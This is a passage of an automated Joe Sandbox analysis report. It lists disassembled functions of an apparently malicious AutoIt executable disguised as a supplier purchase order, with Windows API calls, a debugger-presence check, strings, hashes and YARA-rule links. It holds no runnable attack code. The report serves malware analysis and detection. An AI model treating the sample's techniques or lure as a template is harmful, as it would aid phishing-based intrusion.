                                                                                                                                  • Opcode ID: 2206935adfc1459582397372f2efca7b38e40da720650288d3a267666b95782b
                                                                                                                                  • Instruction ID: 0c9f3ddbae77dc82cffffbcbd709ddd31b6c17bc588ea621dbd74af24d3f9bac
                                                                                                                                  • Opcode Fuzzy Hash: 2206935adfc1459582397372f2efca7b38e40da720650288d3a267666b95782b
                                                                                                                                  • Instruction Fuzzy Hash: 53F0FE7164434597DB20D6E08D45BABB7DDBF98744F081C29B641D6190D6A4E4059722
                                                                                                                                  Function 00EEC450 Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • _free.LIBCMT ref: 00EEC45E
                                                                                                                                    • Part of subcall function 00EC28CA: RtlFreeHeap.NTDLL(00000000,00000000,?,00EC8715,00000000,00EC88A3,00EC4673,?), ref: 00EC28DE
                                                                                                                                    • Part of subcall function 00EC28CA: GetLastError.KERNEL32(00000000,?,00EC8715,00000000,00EC88A3,00EC4673,?), ref: 00EC28F0
                                                                                                                                  • _free.LIBCMT ref: 00EEC46F
                                                                                                                                  • _free.LIBCMT ref: 00EEC481
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                  • Opcode ID: 087bea45b9e552155f1be1c866ba964bb642fabb90d708dc02c9b9c981af8e32
                                                                                                                                  • Instruction ID: ed05fceb282e9197c42f31f7ea05b519e6b0bf660896216ff7324b4a278c0541
                                                                                                                                  • Opcode Fuzzy Hash: 087bea45b9e552155f1be1c866ba964bb642fabb90d708dc02c9b9c981af8e32
                                                                                                                                  • Instruction Fuzzy Hash: C8E0C2A220074082CA28A97A6940FB313CC2F04390B24282DF559F3182CF38E8428234
                                                                                                                                  Function 00EB058E Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 527COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: CALL
                                                                                                                                  • API String ID: 0-4196123274
                                                                                                                                  • Opcode ID: 11cff86a3c8128b7a20076ee924510da745b2dff3377e711e4dac5153fb9ab80
                                                                                                                                  • Instruction ID: 96236710ae5c002b3acb8a098035bfab60d5d928e1161d260e594ce38810a82e
                                                                                                                                  • Opcode Fuzzy Hash: 11cff86a3c8128b7a20076ee924510da745b2dff3377e711e4dac5153fb9ab80
                                                                                                                                  • Instruction Fuzzy Hash: E4229E70509341CFD728DF24C490AABBBE1FF85314F14996DE89AAB362D731E885DB42
                                                                                                                                  Function 00EA4010 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _memmove
                                                                                                                                  • String ID: EA06
                                                                                                                                  • API String ID: 4104443479-3962188686
                                                                                                                                  • Opcode ID: 522a57a1511856bc7353186366440bb432a2ca3bc9c89075cb6907d05eb49fb0
                                                                                                                                  • Instruction ID: 5e4fc574900085a4726cefdae8d83b3e45fd796a278bed08eebd05676cbbdb13
                                                                                                                                  • Opcode Fuzzy Hash: 522a57a1511856bc7353186366440bb432a2ca3bc9c89075cb6907d05eb49fb0
                                                                                                                                  • Instruction Fuzzy Hash: 6D4150E1A0415897CB115B648C91BFE7FE18BEF304F186465E942BF1C2D6A1BD8097A2
                                                                                                                                  Function 00EF013F Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 60COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _wcscmp
                                                                                                                                  • String ID: 0.0.0.0
                                                                                                                                  • API String ID: 856254489-3771769585
                                                                                                                                  • Opcode ID: c7e7cfa65661b92214aa8b4ccd5e5301a48264d0ced60504bb1d3ef9ae5f3a9f
                                                                                                                                  • Instruction ID: 587f2b2e057b01b28e6b10de4f40d17449d4bca18525564cbf6d0b5f838e0394
                                                                                                                                  • Opcode Fuzzy Hash: c7e7cfa65661b92214aa8b4ccd5e5301a48264d0ced60504bb1d3ef9ae5f3a9f
                                                                                                                                  • Instruction Fuzzy Hash: 9811E735600208DFCB04EF54DA81EA9B3E9AF89714F109059F615BF352DA70FD419B90
                                                                                                                                  Function 00EA3BFF Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 54COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • _memset.LIBCMT ref: 00F13CF1
                                                                                                                                    • Part of subcall function 00EA31B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 00EA31DA
                                                                                                                                    • Part of subcall function 00EA3A67: SHGetMalloc.SHELL32(1<), ref: 00EA3A7D
                                                                                                                                    • Part of subcall function 00EA3A67: SHGetDesktopFolder.SHELL32(?), ref: 00EA3A8F
                                                                                                                                    • Part of subcall function 00EA3A67: SHGetPathFromIDListW.SHELL32(?,?), ref: 00EA3AD2
                                                                                                                                    • Part of subcall function 00EA3B45: GetFullPathNameW.KERNEL32(?,00000104,?,?,00F622E8,?), ref: 00EA3B65
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Path$FullName$DesktopFolderFromListMalloc_memset
                                                                                                                                  • String ID: X
                                                                                                                                  • API String ID: 2727075218-3081909835
                                                                                                                                  • Opcode ID: d409d048104659950b782892d002d628ec9256c704cd53ee888469df48375ed8
                                                                                                                                  • Instruction ID: 9af7403d5966d40e832dc5645bf94610ecfab540c36288b7759a349cd590d744
                                                                                                                                  • Opcode Fuzzy Hash: d409d048104659950b782892d002d628ec9256c704cd53ee888469df48375ed8
                                                                                                                                  • Instruction Fuzzy Hash: F211CA71A00298ABCF05DFE8D8056DEBBF9AF4A704F00400DF501BB242CBB55A499BA1
                                                                                                                                  Function 00EA34C1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 00F134AA
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: LibraryLoad
                                                                                                                                  • String ID: >>>AUTOIT NO CMDEXECUTE<<<
                                                                                                                                  • API String ID: 1029625771-2684727018
                                                                                                                                  • Opcode ID: 1e3c754ef547666d2ccb857e8ae620c09330895d6d6e2746a4be617e606c83b3
                                                                                                                                  • Instruction ID: c8cfab2a65cd98a7144ff4ddba4898b8a8afbaf0fb5949bb5b68903b5fb41eda
                                                                                                                                  • Opcode Fuzzy Hash: 1e3c754ef547666d2ccb857e8ae620c09330895d6d6e2746a4be617e606c83b3
                                                                                                                                  • Instruction Fuzzy Hash: 87F06D71D0420DAE8F11EFB0D8519FFF7B86A15310F20D526F425A6041D734AB09D721
                                                                                                                                  Function 00F1813B Relevance: 3.2, APIs: 2, Instructions: 212COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ClearVariant
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1473721057-0
                                                                                                                                  • Opcode ID: 3abd6073b785ea5047a84ab8067be061e3b0546fdfb958f7def157557bf6f478
                                                                                                                                  • Instruction ID: 689c77f48a620e13211cd5019c9dc15242b78de2aa180906d5eb5c5f25fda644
                                                                                                                                  • Opcode Fuzzy Hash: 3abd6073b785ea5047a84ab8067be061e3b0546fdfb958f7def157557bf6f478
                                                                                                                                  • Instruction Fuzzy Hash: 9D81897490060A9BCB20DF58C881AEAB7B5FF04314F689529E859AB365D735ED82CB80
                                                                                                                                  Function 00EBF461 Relevance: 3.2, APIs: 2, Instructions: 159COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: e5a9329ec84b97006f5df13a4440ce841a7a0b2547f1c427d89b9f04e6637c50
                                                                                                                                  • Instruction ID: eccb51cf973c5823a3ad42a6e70738ad3ddd76fa35a2c860de4f66f1579e974b
                                                                                                                                  • Opcode Fuzzy Hash: e5a9329ec84b97006f5df13a4440ce841a7a0b2547f1c427d89b9f04e6637c50
                                                                                                                                  • Instruction Fuzzy Hash: 7D51B6316043018FCB14EF24D891BEBB3E5AF89324F14956DF966AB292CB30EC45CB51
                                                                                                                                  Function 00EF8065 Relevance: 3.1, APIs: 2, Instructions: 98COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetCursorPos.USER32(?), ref: 00EF8074
                                                                                                                                  • GetForegroundWindow.USER32 ref: 00EF807A
                                                                                                                                    • Part of subcall function 00EF6B19: GetWindowRect.USER32(?,?), ref: 00EF6B2C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$CursorForegroundRect
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1066937146-0
                                                                                                                                  • Opcode ID: e9ac7904eb50ee877d230093e27f5e8e1881829057db4657e457ede60d3bc968
                                                                                                                                  • Instruction ID: 26fb99632beec8e08d9766bc5b286c8a2488eb9cf2f8f670848bd23d41dcd9c9
                                                                                                                                  • Opcode Fuzzy Hash: e9ac7904eb50ee877d230093e27f5e8e1881829057db4657e457ede60d3bc968
                                                                                                                                  • Instruction Fuzzy Hash: 6C310D75A00208AFDF10EFA4CD81AEEB7F8FF18314F10552AEA55B7251DB34AE458B51
                                                                                                                                  Function 00EA1DCE Relevance: 3.1, APIs: 2, Instructions: 71COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • IsWindow.USER32(00000000), ref: 00F1DB31
                                                                                                                                  • IsWindow.USER32(00000000), ref: 00F1DB6B
                                                                                                                                    • Part of subcall function 00EA1F04: GetForegroundWindow.USER32 ref: 00EA1FBE
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$Foreground
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 62970417-0
                                                                                                                                  • Opcode ID: fc14a4a092a8bda8a0e2ef4a77897f9637297a693e7213d7208209ecf94c41bb
                                                                                                                                  • Instruction ID: 1abb795ca83ef7fc710bfea4a40ff1030426eed202b90d5bc25b569a59935265
                                                                                                                                  • Opcode Fuzzy Hash: fc14a4a092a8bda8a0e2ef4a77897f9637297a693e7213d7208209ecf94c41bb
                                                                                                                                  • Instruction Fuzzy Hash: D821C07260020AAADB20AB34C881BFE77E99F89394F01442DF95BAB151DB30FD01E760
                                                                                                                                  Function 00EDE2E8 Relevance: 3.1, APIs: 2, Instructions: 69windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EA193B: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00EA1952
                                                                                                                                  • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00EDE344
                                                                                                                                  • _strlen.LIBCMT ref: 00EDE34F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$Timeout_strlen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2777139624-0
                                                                                                                                  • Opcode ID: bfcea2da6c8383ec63b0f3973e616ebd1c1bb6a7adf2994fe4175a89403aa483
                                                                                                                                  • Instruction ID: dedf7dda4854fa335638eedb3f7b3de2f780716a761a4932be97743b611484b9
                                                                                                                                  • Opcode Fuzzy Hash: bfcea2da6c8383ec63b0f3973e616ebd1c1bb6a7adf2994fe4175a89403aa483
                                                                                                                                  • Instruction Fuzzy Hash: 2911A731200205A7CB04BB68DCCADBF7BE9DF49744B10643EF606BF392DE64984796A0
                                                                                                                                  Function 00EA3682 Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • 745EC8D0.UXTHEME ref: 00EA36E6
                                                                                                                                    • Part of subcall function 00EC2025: __lock.LIBCMT ref: 00EC202B
                                                                                                                                    • Part of subcall function 00EA32DE: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00EA32F6
                                                                                                                                    • Part of subcall function 00EA32DE: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00EA330B
                                                                                                                                    • Part of subcall function 00EA374E: GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,00000001), ref: 00EA376D
                                                                                                                                    • Part of subcall function 00EA374E: IsDebuggerPresent.KERNEL32(?,?), ref: 00EA377F
                                                                                                                                    • Part of subcall function 00EA374E: GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe,00000104,?,00F61120,C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe,00F61124,?,?), ref: 00EA37EE
                                                                                                                                    • Part of subcall function 00EA374E: SetCurrentDirectoryW.KERNEL32(?), ref: 00EA3860
                                                                                                                                  • SystemParametersInfoW.USER32(00002001,00000000,?,00000002), ref: 00EA3726
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: InfoParametersSystem$CurrentDirectory$DebuggerFullNamePathPresent__lock
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3809921791-0
                                                                                                                                  • Opcode ID: 8b0cb55183a6f039088e67f0ee372ce0a042bbbe916a278eaf47e92407ae15c1
                                                                                                                                  • Instruction ID: 9e3e09aa6796605aa18f7c449d0a48f39002180e63c935133d1d394aa7e140a7
                                                                                                                                  • Opcode Fuzzy Hash: 8b0cb55183a6f039088e67f0ee372ce0a042bbbe916a278eaf47e92407ae15c1
                                                                                                                                  • Instruction Fuzzy Hash: CE11CD718083499BC720DF29DC0694ABBE8FF85750F00451FF5A5972B1DBB19941DB92
                                                                                                                                  Function 00EA4B88 Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000001,?,00EA4C2B,?,?,?,?,00EABE63), ref: 00EA4BB6
                                                                                                                                  • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000001,?,00EA4C2B,?,?,?,?,00EABE63), ref: 00F14972
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateFile
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 823142352-0
                                                                                                                                  • Opcode ID: 539a1b20a8d7915f3a108505738284107024173b5d3cb041799d3d6d32247aeb
